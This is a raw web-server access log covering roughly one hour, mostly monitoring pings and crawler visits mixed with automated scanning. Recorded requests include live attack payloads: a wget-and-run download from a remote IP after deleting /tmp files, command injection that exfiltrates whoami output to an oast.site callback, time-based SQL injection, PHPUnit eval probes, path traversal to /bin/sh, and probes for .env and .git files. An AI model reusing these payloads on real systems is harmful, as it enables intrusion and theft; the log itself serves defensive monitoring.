212.91.247.32 - - [02/Jul/2025:18:05:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
43.159.149.56 - - [02/Jul/2025:18:06:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
212.91.247.32 - - [02/Jul/2025:18:06:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
40.77.167.44 - - [02/Jul/2025:18:07:53 +0200] "GET /www.soundpatcher.de/web/env/env.html HTTP/1.1" 404 352 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:18:07:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.45 - - [02/Jul/2025:18:08:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
176.65.148.183 - - [02/Jul/2025:18:08:41 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:18:08:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
168.205.38.112 - - [02/Jul/2025:18:08:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello-World/1.0"
212.91.247.32 - - [02/Jul/2025:18:09:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:18:10:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:18:11:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.65.148.229 - - [02/Jul/2025:18:12:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [02/Jul/2025:18:12:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:18:13:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:18:14:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:18:15:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
134.122.30.191 - - [02/Jul/2025:18:16:15 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
134.122.30.191 - - [02/Jul/2025:18:16:15 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
47.237.115.100 - - [02/Jul/2025:18:16:18 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.247.32 - - [02/Jul/2025:18:16:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:18:17:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
216.244.66.234 - - [02/Jul/2025:18:18:16 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
212.91.247.32 - - [02/Jul/2025:18:18:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:18:19:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:18:20:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:18:21:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:18:22:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:18:23:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:18:24:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:18:25:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:18:26:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.65.149.178 - - [02/Jul/2025:18:27:11 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.82:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
212.91.247.32 - - [02/Jul/2025:18:27:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:18:28:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.47 - - [02/Jul/2025:18:29:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [02/Jul/2025:18:29:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:18:30:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:18:31:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.65.148.229 - - [02/Jul/2025:18:32:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [02/Jul/2025:18:32:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
160.30.44.120 - - [02/Jul/2025:18:33:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
43.135.139.165 - - [02/Jul/2025:18:33:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
95.214.53.84 - - [02/Jul/2025:18:33:45 +0200] "GET /login.asp HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:18:33:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.92.206.122 - - [02/Jul/2025:18:34:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello-World/1.0"
212.91.247.32 - - [02/Jul/2025:18:34:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:18:35:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:18:36:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.47 - - [02/Jul/2025:18:37:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [02/Jul/2025:18:37:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:18:38:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.84 - - [02/Jul/2025:18:39:10 +0200] "GET /login.asp HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:18:39:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:18:40:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.84 - - [02/Jul/2025:18:41:07 +0200] "GET /login.asp HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:18:41:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.153.48 - - [02/Jul/2025:18:42:01 +0200] "GET /wp-content/plugins/mstore-api/readme.txt HTTP/1.1" 404 345 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0"
77.90.153.48 - - [02/Jul/2025:18:42:02 +0200] "GET /getsamplebacklog?arg1=2d0ows2x9anpzaorxi9h4csmai08jjor&arg2=%7b%22type%22%3a%22client%22%2c%22earliest%22%3a%221676976316.328%7c%7cnslookup%20%24(xxd%20-pu%20%3c%3c%3c%20%24(whoami)).d1f553p9gkq560tu7mcg7pdxr1n99wk33.oast.site%7c%7cx%22%2c%22latest%22%3a1676976916.328%2c%22origins%22%3a%5b%7b%22ip%22%3a%22212.91.246.88%22%2c%22source%22%3a0%7d%5d%2c%22seriesID%22%3a3%7d&arg3=undefined&arg4=undefined&arg5=undefined&arg6=undefined&arg7=undefined HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
77.90.153.48 - - [02/Jul/2025:18:42:02 +0200] "GET /bypass/config?type=sqs&keyId=test&key=security&queueUrl=http://d1f553p9gkq560tu7mcg7s4u38amjhacn.oast.site/ HTTP/1.1" 404 318 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
77.90.153.48 - - [02/Jul/2025:18:42:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0"
212.91.247.32 - - [02/Jul/2025:18:42:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.218.84.45 - - [02/Jul/2025:18:43:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.218.84.45 - - [02/Jul/2025:18:43:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [02/Jul/2025:18:43:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.84 - - [02/Jul/2025:18:43:56 +0200] "GET /login.asp HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
104.155.20.12 - - [02/Jul/2025:18:44:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.32.4"
212.91.247.32 - - [02/Jul/2025:18:44:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.153.48 - - [02/Jul/2025:18:45:15 +0200] "POST /cgi-bin/cstecgi.cgi HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0"
77.90.153.48 - - [02/Jul/2025:18:45:26 +0200] "POST /cgi-bin/cstecgi.cgi HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0"
77.90.153.48 - - [02/Jul/2025:18:45:40 +0200] "GET /2z5DLDmm3Nhf4Uoyk0NOGHAGaxa HTTP/1.1" 404 332 "-" "Mozilla/5.0 (X11; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0"
212.91.247.32 - - [02/Jul/2025:18:45:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.121.84.130 - - [02/Jul/2025:18:46:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [02/Jul/2025:18:46:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:18:47:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:18:48:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.131.155.254 - - [02/Jul/2025:18:49:00 +0200] "\x16\x03\x01" 501 318 "-" "-"
185.218.84.47 - - [02/Jul/2025:18:49:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
77.90.153.48 - - [02/Jul/2025:18:49:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Safari/605.1.15"
45.131.155.254 - - [02/Jul/2025:18:49:12 +0200] "\x16\x03\x01" 501 318 "-" "-"
77.90.153.48 - - [02/Jul/2025:18:49:17 +0200] "GET /modules/leocustomajax/leoajax.php?cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
45.131.155.254 - - [02/Jul/2025:18:49:32 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.131.155.254 - - [02/Jul/2025:18:49:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:18:49:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.84 - - [02/Jul/2025:18:50:52 +0200] "GET /login.asp HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:18:50:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:18:51:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:18:52:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [02/Jul/2025:18:53:03 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
87.121.84.149 - - [02/Jul/2025:18:53:39 +0200] "GET http://ifconfig.me/ HTTP/1.1" 200 1229 "-" "curl/7.81.0"
212.91.247.32 - - [02/Jul/2025:18:53:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [02/Jul/2025:18:53:54 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13F69 Safari/601.1"
80.82.77.202 - - [02/Jul/2025:18:54:02 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
79.124.58.198 - - [02/Jul/2025:18:54:25 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
80.82.77.202 - - [02/Jul/2025:18:54:34 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.247.32 - - [02/Jul/2025:18:54:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.142.125.210 - - [02/Jul/2025:18:55:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.210 - - [02/Jul/2025:18:55:08 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.210 - - [02/Jul/2025:18:55:09 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
162.142.125.210 - - [02/Jul/2025:18:55:17 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
162.142.125.210 - - [02/Jul/2025:18:55:18 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
80.82.77.202 - - [02/Jul/2025:18:55:21 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13F69 Safari/601.1"
162.142.125.210 - - [02/Jul/2025:18:55:25 +0200] "\x16\x03\x01" 501 318 "-" "-"
80.82.77.202 - - [02/Jul/2025:18:55:26 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
162.142.125.210 - - [02/Jul/2025:18:55:30 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
80.82.77.202 - - [02/Jul/2025:18:55:31 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
212.91.247.32 - - [02/Jul/2025:18:55:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.82.77.202 - - [02/Jul/2025:18:55:59 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
118.194.253.212 - - [02/Jul/2025:18:56:04 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Custom-AsyncHttpClient"
80.82.77.202 - - [02/Jul/2025:18:56:05 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (iPad; CPU OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13F69 Safari/601.1"
43.130.67.33 - - [02/Jul/2025:18:56:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
185.218.84.46 - - [02/Jul/2025:18:56:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.247.32 - - [02/Jul/2025:18:56:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:18:57:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:18:58:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:18:59:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [02/Jul/2025:19:00:02 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
195.3.221.137 - - [02/Jul/2025:19:00:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [02/Jul/2025:19:00:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [02/Jul/2025:19:00:59 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:19:01:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.84 - - [02/Jul/2025:19:01:57 +0200] "GET /login.asp HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:19:02:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:19:03:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:19:04:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
95.214.53.84 - - [02/Jul/2025:19:05:23 +0200] "GET /login.asp HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
195.3.221.137 - - [02/Jul/2025:19:05:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [02/Jul/2025:19:05:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.99.169.172 - - [02/Jul/2025:19:06:14 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
167.99.169.172 - - [02/Jul/2025:19:06:15 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.99.169.172 - - [02/Jul/2025:19:06:15 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.99.169.172 - - [02/Jul/2025:19:06:15 +0200] "\x16\x03\x01" 501 318 "-" "-"
167.99.169.172 - - [02/Jul/2025:19:06:16 +0200] "\x16\x03\x01" 501 318 "-" "-"
167.99.169.172 - - [02/Jul/2025:19:06:16 +0200] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
167.99.169.172 - - [02/Jul/2025:19:06:16 +0200] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.99.169.172 - - [02/Jul/2025:19:06:17 +0200] "\x16\x03\x01" 501 318 "-" "-"
167.99.169.172 - - [02/Jul/2025:19:06:17 +0200] "GET /t4 HTTP/1.1" 404 307 "-" "Mozilla/5.0"
167.99.169.172 - - [02/Jul/2025:19:06:17 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.99.169.172 - - [02/Jul/2025:19:06:18 +0200] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.91.247.32 - - [02/Jul/2025:19:06:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
41.36.0.37 - - [02/Jul/2025:19:07:19 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+38.57.46.116/jaws;sh+/tmp/jaws HTTP/1.1" 404 306 "-" "Hello, world"
195.3.221.137 - - [02/Jul/2025:19:07:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [02/Jul/2025:19:07:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
176.65.148.183 - - [02/Jul/2025:19:08:04 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
79.124.58.198 - - [02/Jul/2025:19:08:32 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
3.249.82.191 - - [02/Jul/2025:19:08:52 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
212.91.247.32 - - [02/Jul/2025:19:08:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
79.124.58.198 - - [02/Jul/2025:19:08:57 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
77.90.153.48 - - [02/Jul/2025:19:09:50 +0200] "POST /Servlet/Skins HTTP/1.1" 404 318 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
212.91.247.32 - - [02/Jul/2025:19:09:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
77.90.153.48 - - [02/Jul/2025:19:10:01 +0200] "POST /Servlet/Skins HTTP/1.1" 404 318 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
